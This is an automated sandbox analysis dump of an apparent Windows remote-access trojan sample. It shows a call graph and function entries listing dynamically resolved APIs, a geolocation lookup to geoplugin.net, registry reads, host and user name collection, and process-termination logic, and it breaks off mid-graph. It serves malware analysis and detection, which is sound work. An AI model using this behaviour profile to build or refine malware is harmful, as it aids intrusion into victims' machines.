48537->48541 48543 40490f 48539->48543 48546 402093 28 API calls 48540->48546 48667 41cae1 30 API calls 48541->48667 48542 40492b 48542->48540 48545 404941 48542->48545 48547 402093 28 API calls 48543->48547 48556 404950 48545->48556 48557 404987 48545->48557 48549 404a80 48546->48549 48550 40491e 48547->48550 48548 404a40 48668 4052fd 28 API calls 48548->48668 48553 402093 28 API calls 48549->48553 48554 41b4ef 80 API calls 48550->48554 48558 404a8f 48553->48558 48554->48536 48561 402093 28 API calls 48556->48561 48664 421a40 54 API calls 48557->48664 48562 41b4ef 80 API calls 48558->48562 48565 40495f 48561->48565 48562->48534 48564 40498f 48567 4049c4 48564->48567 48568 404994 48564->48568 48569 402093 28 API calls 48565->48569 48666 420e06 28 API calls 48567->48666 48571 402093 28 API calls 48568->48571 48572 40496e 48569->48572 48574 4049a3 48571->48574 48575 41b4ef 80 API calls 48572->48575 48578 402093 28 API calls 48574->48578 48579 404973 48575->48579 48576 4049cc 48577 4049f9 CreateEventW CreateEventW 48576->48577 48580 402093 28 API calls 48576->48580 48577->48534 48581 4049b2 48578->48581 48663 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48579->48663 48582 4049e2 48580->48582 48583 41b4ef 80 API calls 48581->48583 48585 402093 28 API calls 48582->48585 48586 4049b7 48583->48586 48587 4049f1 48585->48587 48665 4210b2 52 API calls 48586->48665 48589 41b4ef 80 API calls 48587->48589 48590 4049f6 48589->48590 48590->48577 48669 41b7b6 GlobalMemoryStatusEx 48591->48669 48593 41b7f5 48593->47984 48670 414580 48594->48670 48598 441e8d 48597->48598 48700 441c7d 48598->48700 48600 441eae 48600->47984 48602 40dda5 48601->48602 48603 4134ff 3 API calls 48602->48603 48605 40ddac 48603->48605 48604 40ddc4 48604->47984 48605->48604 48606 413549 3 API calls 48605->48606 48606->48604 48608 4020b7 28 API calls 48607->48608 48609 41bc57 48608->48609 48609->47984 48611 41bd2b 48610->48611 48612 4020b7 28 API calls 48611->48612 48613 41bd3d 48612->48613 48613->47984 48615 441e81 20 API calls 48614->48615 48616 41bbb2 48615->48616 48617 402093 28 API calls 48616->48617 48618 41bbc0 48617->48618 48618->47984 48620 41bafc GetTickCount 48619->48620 48620->48000 48622 436e90 ___scrt_fastfail 48621->48622 48623 41bab5 GetForegroundWindow GetWindowTextW 48622->48623 48624 40417e 28 API calls 48623->48624 48625 41badf 48624->48625 48625->48000 48627 402093 28 API calls 48626->48627 48628 40f8f6 48627->48628 48628->48000 48629->48000 48631 4020df 11 API calls 48630->48631 48632 404c27 48631->48632 48633 4020df 11 API calls 48632->48633 48637 404c30 48633->48637 48634 43bd51 ___std_exception_copy 21 API calls 48634->48637 48636 404c96 48636->48637 48639 404ca1 48636->48639 48637->48634 48637->48636 48638 4020b7 28 API calls 48637->48638 48640 401fe2 28 API calls 48637->48640 48643 401fd8 11 API calls 48637->48643 48705 404cc3 48637->48705 48717 404b96 57 API calls 48637->48717 48638->48637 48718 404e26 99 API calls 48639->48718 48640->48637 48642 404ca8 48644 401fd8 11 API calls 48642->48644 48643->48637 48645 404cb1 48644->48645 48646 401fd8 11 API calls 48645->48646 48647 404cba 48646->48647 48647->47959 48649->47984 48650->47959 48652->48000 48653->47959 48654->47959 48655->48508 48656->48515 48661 40515c 102 API calls 48658->48661 48660 405159 48661->48660 48662->48542 48663->48534 48664->48564 48665->48579 48666->48576 48667->48548 48669->48593 48673 414553 48670->48673 48674 414568 ___scrt_initialize_default_local_stdio_options 48673->48674 48677 43f79d 48674->48677 48680 43c4f0 48677->48680 48681 43c530 48680->48681 48682 43c518 48680->48682 48681->48682 48684 43c538 48681->48684 48695 4405dd 20 API calls _Atexit 48682->48695 48696 43a7b7 36 API calls 3 library calls 48684->48696 48686 43c548 48697 43cc76 20 API calls 2 library calls 48686->48697 48687 43c51d _strftime 48689 434fcb TranslatorGuardHandler 5 API calls 48687->48689 48691 414576 48689->48691 48690 43c5c0 48698 43d2e4 51 API calls 3 library calls 48690->48698 48691->47984 48694 43c5cb 48699 43cce0 20 API calls _free 48694->48699 48695->48687 48696->48686 48697->48690 48698->48694 48699->48687 48701 441c94 48700->48701 48703 441ccb _strftime 48701->48703 48704 4405dd 20 API calls _Atexit 48701->48704 48703->48600 48704->48703 48706 4020df 11 API calls 48705->48706 48710 404cde 48706->48710 48707 404e13 48708 401fd8 11 API calls 48707->48708 48709 404e1c 48708->48709 48709->48636 48710->48707 48711 401fd8 11 API calls 48710->48711 48712 401fc0 28 API calls 48710->48712 48713 4020f6 28 API calls 48710->48713 48715 4041a2 28 API calls 48710->48715 48716 401fe2 28 API calls 48710->48716 48711->48710 48714 404dad CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 48712->48714 48713->48710 48714->48710 48719 415aea 48714->48719 48715->48710 48716->48710 48717->48637 48718->48642 48720 4020f6 28 API calls 48719->48720 48721 415b0c SetEvent 48720->48721 48722 415b21 48721->48722 48723 4041a2 28 API calls 48722->48723 48724 415b3b 48723->48724 48725 4020f6 28 API calls 48724->48725 48726 415b4b 48725->48726 48727 4020f6 28 API calls 48726->48727 48728 415b5d 48727->48728 48729 41be1b 28 API calls 48728->48729 48730 415b66 48729->48730 48731 417089 48730->48731 48732 415b86 GetTickCount 48730->48732 48733 415d2f 48730->48733 48734 401e8d 11 API calls 48731->48734 48735 41bb8e 28 API calls 48732->48735 48733->48731 48797 415ce5 48733->48797 48736 417092 48734->48736 48737 415b97 48735->48737 48739 401fd8 11 API calls 48736->48739 48740 41bae6 GetTickCount 48737->48740 48741 41709e 48739->48741 48742 415ba3 48740->48742 48743 401fd8 11 API calls 48741->48743 48744 41bb8e 28 API calls 48742->48744 48745 4170aa 48743->48745 48746 415bae 48744->48746 48747 41ba96 30 API calls 48746->48747 48748 415bbc 48747->48748 48749 41bd1e 28 API calls 48748->48749 48750 415bca 48749->48750 48751 401e65 22 API calls 48750->48751 48752 415bd8 48751->48752 48798 402f31 28 API calls 48752->48798 48754 415be6 48799 402ea1 28 API calls 48754->48799 48756 415bf5 48757 402f10 28 API calls 48756->48757 48758 415c04 48757->48758 48800 402ea1 28 API calls 48758->48800 48760 415c13 48761 402f10 28 API calls 48760->48761 48762 415c1f 48761->48762 48801 402ea1 28 API calls 48762->48801 48764 415c29 48802 404aa1 61 API calls ctype 48764->48802 48766 415c38 48767 401fd8 11 API calls 48766->48767 48768 415c41 48767->48768 48769 401fd8 11 API calls 48768->48769 48770 415c4d 48769->48770 48771 401fd8 11 API calls 48770->48771 48772 415c59 48771->48772 48773 401fd8 11 API calls 48772->48773 48774 415c65 48773->48774 48775 401fd8 11 API calls 48774->48775 48776 415c71 48775->48776 48777 401fd8 11 API calls 48776->48777 48778 415c7d 48777->48778 48779 401f09 11 API calls 48778->48779 48780 415c86 48779->48780 48781 401fd8 11 API calls 48780->48781 48782 415c8f 48781->48782 48783 401fd8 11 API calls 48782->48783 48784 415c98 48783->48784 48785 401e65 22 API calls 48784->48785 48786 415ca3 48785->48786 48787 43baac _strftime 40 API calls 48786->48787 48788 415cb0 48787->48788 48789 415cb5 48788->48789 48790 415cdb 48788->48790 48792 415cc3 48789->48792 48793 415cce 48789->48793 48791 401e65 22 API calls 48790->48791 48791->48797 48803 404ff4 82 API calls 48792->48803 48794 404f51 105 API calls 48793->48794 48796 415cc9 48794->48796 48796->48731 48797->48731 48804 4050e4 84 API calls 48797->48804 48798->48754 48799->48756 48800->48760 48801->48764 48802->48766 48803->48796 48804->48796 48807 401f8e 48806->48807 48808 402252 11 API calls 48807->48808 48809 401f99 48808->48809 48809->48027 48809->48028 48809->48030 48810->48035 48811->48060 48812->48059 48813->48049 48814->48054 48815->48061 48816->48092 48821 40f7c2 48819->48821 48820 413549 3 API calls 48820->48821 48821->48820 48822 40f866 48821->48822 48825 40f856 Sleep 48821->48825 48841 40f7f4 48821->48841 48824 40905c 28 API calls 48822->48824 48823 40905c 28 API calls 48823->48841 48827 40f871 48824->48827 48825->48821 48826 41bc5e 28 API calls 48826->48841 48829 41bc5e 28 API calls 48827->48829 48830 40f87d 48829->48830 48854 413814 14 API calls 48830->48854 48833 401f09 11 API calls 48833->48841 48834 40f890 48835 401f09 11 API calls 48834->48835 48837 40f89c 48835->48837 48836 402093 28 API calls 48836->48841 48838 402093 28 API calls 48837->48838 48839 40f8ad 48838->48839 48842 41376f 14 API calls 48839->48842 48840 41376f 14 API calls 48840->48841 48841->48823 48841->48825 48841->48826 48841->48833 48841->48836 48841->48840 48852 40d096 112 API calls ___scrt_fastfail 48841->48852 48853 413814 14 API calls 48841->48853 48843 40f8c0 48842->48843 48855 412850 TerminateProcess WaitForSingleObject 48843->48855 48845 40f8c8 ExitProcess 48856 4127ee 62 API calls 48846->48856 48853->48841 48854->48834 48855->48845 48857 4269e6 48858 4269fb 48857->48858 48865 426a8d 48857->48865 48859 426a48 48858->48859 48860 426b44 48858->48860 48861 426abd 48858->48861 48862 426b1d 48858->48862 48858->48865 48867 426af2 48858->48867 48870 426a7d 48858->48870 48885 424edd 49 API calls ctype 48858->48885 48859->48865 48859->48870 48886 41fb6c 52 API calls 48859->48886 48860->48865 48890 426155 28 API calls 48860->48890 48861->48865 48861->48867 48888 41fb6c 52 API calls 48861->48888 48862->48860 48862->48865 48873 425ae1 48862->48873 48867->48862 48889 4256f0 21 API calls 48867->48889 48870->48861 48870->48865 48887 424edd 49 API calls ctype 48870->48887 48874 425b00 ___scrt_fastfail 48873->48874 48876 425b0f 48874->48876 48879 425b34 48874->48879 48891 41ebbb 21 API calls 48874->48891 48876->48879 48884 425b14 48876->48884 48892 4205d8 46 API calls 48876->48892 48879->48860 48880 425b1d 48880->48879 48895 424d05 21 API calls 2 library calls 48880->48895 48882 425bb7 48882->48879 48893 432ec4 21 API calls ___std_exception_copy 48882->48893 48884->48879 48884->48880 48894 41da5f 49 API calls 48884->48894 48885->48859 48886->48859 48887->48861 48888->48861 48889->48862 48890->48865 48891->48876 48892->48882 48893->48884 48894->48880 48895->48879 48896 415d06 48911 41b380 48896->48911 48898 415d0f 48899 4020f6 28 API calls 48898->48899 48900 415d1e 48899->48900 48922 404aa1 61 API calls ctype 48900->48922 48902 415d2a 48903 417089 48902->48903 48904 401fd8 11 API calls 48902->48904 48905 401e8d 11 API calls 48903->48905 48904->48903 48906 417092 48905->48906 48907 401fd8 11 API calls 48906->48907 48908 41709e 48907->48908 48909 401fd8 11 API calls 48908->48909 48910 4170aa 48909->48910 48912 4020df 11 API calls 48911->48912 48913 41b38e 48912->48913 48914 43bd51 ___std_exception_copy 21 API calls 48913->48914 48915 41b39e InternetOpenW InternetOpenUrlW 48914->48915 48916 41b3c5 InternetReadFile 48915->48916 48920 41b3e8 48916->48920 48917 4020b7 28 API calls 48917->48920 48918 41b415 InternetCloseHandle InternetCloseHandle 48919 41b427 48918->48919 48919->48898 48920->48916 48920->48917 48920->48918 48921 401fd8 11 API calls 48920->48921 48921->48920 48922->48902 48923 426c4b 48928 426cc8 send 48923->48928 48929 44375d 48930 443766 48929->48930 48931 44377f 48929->48931 48932 44376e 48930->48932 48936 4437e5 48930->48936 48934 443776 48934->48932 48947 443ab2 22 API calls 2 library calls 48934->48947 48937 4437f1 48936->48937 48938 4437ee 48936->48938 48948 44f3dd GetEnvironmentStringsW 48937->48948 48938->48934 48941 4437fe 48943 446782 _free 20 API calls 48941->48943 48944 443833 48943->48944 48944->48934 48945 443809 48946 446782 _free 20 API calls 48945->48946 48946->48941 48947->48931 48949 44f3f1 48948->48949 48950 4437f8 48948->48950 48956 446137 48949->48956 48950->48941 48955 44390a 26 API calls 3 library calls 48950->48955 48952 44f405 ctype 48953 446782 _free 20 API calls 48952->48953 48954 44f41f FreeEnvironmentStringsW 48953->48954 48954->48950 48955->48945 48957 446175 48956->48957 48961 446145 ___crtLCMapStringA 48956->48961 48964 4405dd 20 API calls _Atexit 48957->48964 48958 446160 RtlAllocateHeap 48960 446173 48958->48960 48958->48961 48960->48952 48961->48957 48961->48958 48963 442f80 7 API calls 2 library calls 48961->48963 48963->48961 48964->48960 48965 43be58 48968 43be64 _swprintf CallCatchBlock 48965->48968 48966 43be72 48981 4405dd 20 API calls _Atexit 48966->48981 48968->48966 48970 43be9c 48968->48970 48969 43be77 _strftime CallCatchBlock 48976 445888 EnterCriticalSection 48970->48976 48972 43bea7 48977 43bf48 48972->48977 48976->48972 48979 43bf56 48977->48979 48978 43beb2 48982 43becf LeaveCriticalSection std::_Lockit::~_Lockit 48978->48982 48979->48978 48983 44976c 37 API calls 2 library calls 48979->48983 48981->48969 48982->48969 48983->48979 48984 41dfbd 48985 41dfd2 ctype ___scrt_fastfail 48984->48985 48986 41e1d5 48985->48986 49003 432ec4 21 API calls ___std_exception_copy 48985->49003 48992 41e189 48986->48992 48998 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 48986->48998 48989 41e1e6 48989->48992 48999 432ec4 21 API calls ___std_exception_copy 48989->48999 48991 41e182 ___scrt_fastfail 48991->48992 49004 432ec4 21 API calls ___std_exception_copy 48991->49004 48994 41e21f ___scrt_fastfail 48994->48992 49000 43354a 48994->49000 48996 41e1af ___scrt_fastfail 48996->48992 49005 432ec4 21 API calls ___std_exception_copy 48996->49005 48998->48989 48999->48994 49006 433469 49000->49006 49002 433552 49002->48992 49003->48991 49004->48996 49005->48986 49007 433482 49006->49007 49008 433478 49006->49008 49007->49008 49012 432ec4 21 API calls ___std_exception_copy 49007->49012 49008->49002 49010 4334a3 49010->49008 49013 433837 CryptAcquireContextA 49010->49013 49012->49010 49014 433858 CryptGenRandom 49013->49014 49015 433853 49013->49015 49014->49015 49016 43386d CryptReleaseContext 49014->49016 49015->49008 49016->49015 49017 40165e 49018 401666 49017->49018 49019 401669 49017->49019 49020 4016a8 49019->49020 49023 401696 49019->49023 49021 4344ea new 22 API calls 49020->49021 49022 40169c 49021->49022 49024 4344ea new 22 API calls 49023->49024 49024->49022 49025 426bdc 49031 426cb1 recv 49025->49031 49032 42f8ed 49033 42f8f8 49032->49033 49034 42f90c 49033->49034 49036 432eee 49033->49036 49037 432efd 49036->49037 49039 432ef9 49036->49039 49040 440f0d 49037->49040 49039->49034 49041 446185 49040->49041 49042 446192 49041->49042 49043 44619d 49041->49043 49045 446137 ___crtLCMapStringA 21 API calls 49042->49045 49044 4461a5 49043->49044 49051 4461ae ___crtLCMapStringA 49043->49051 49046 446782 _free 20 API calls 49044->49046 49049 44619a 49045->49049 49046->49049 49047 4461b3 49053 4405dd 20 API calls _Atexit 49047->49053 49048 4461d8 RtlReAllocateHeap 49048->49049 49048->49051 49049->49039 49051->49047 49051->49048 49054 442f80 7 API calls 2 library calls 49051->49054 49053->49049 49054->49051

                            Executed Functions

                            Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                            • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                            • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                            • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                            • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                            • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad$HandleModule
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                            • API String ID: 4236061018-3687161714
                            • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                            • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                            • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                            • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                            Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1082 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1087 41b3c5-41b3e6 InternetReadFile 1082->1087 1088 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1087->1088 1089 41b40c-41b40f 1087->1089 1088->1089 1091 41b411-41b413 1089->1091 1092 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1089->1092 1091->1087 1091->1092 1096 41b427-41b431 1092->1096
                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                            • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                            • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                            • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                            • Opcode Fuzzy Hash: 4404311406b4a12e258bc180555c1bc499fb9e537e63fa9c5eb012b199318316
                            • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                            Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                              • Part of subcall function 00413549: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                              • Part of subcall function 00413549: RegCloseKey.KERNELBASE(?), ref: 00413592
                            • Sleep.KERNELBASE(00000BB8), ref: 0040F85B
                            • ExitProcess.KERNEL32 ref: 0040F8CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 5.1.0 Pro$override$pth_unenc
                            • API String ID: 2281282204-182549033
                            • Opcode ID: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                            • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                            • Opcode Fuzzy Hash: 0c6c273467781de05ac3cf7c04fce85a932ac025a43e79accc6add002e08d8ca
                            • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                            Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00F9E638), ref: 00433849
                            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                            • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                            • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                            Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                            Download Yara Rule
                            APIs
                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750E4), ref: 0041B62A
                            • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser
                            • String ID:
                            • API String ID: 4229901323-0
                            • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                            • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                            • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                            • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                            Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                            • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                            • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                            Function 0040E9C5 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 100 40f34f-40f36a call 401fab call 4139a9 call 412475 69->100 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 99 40ebec-40ec02 call 401fab call 4139a9 80->99 94 40ec1c 88->94 95 40ec1e-40ec2a call 41b2c3 88->95 93 40eef1 89->93 93->49 94->95 104 40ec33-40ec37 95->104 105 40ec2c-40ec2e 95->105 99->79 126 40f36f-40f3a0 call 41bc5e 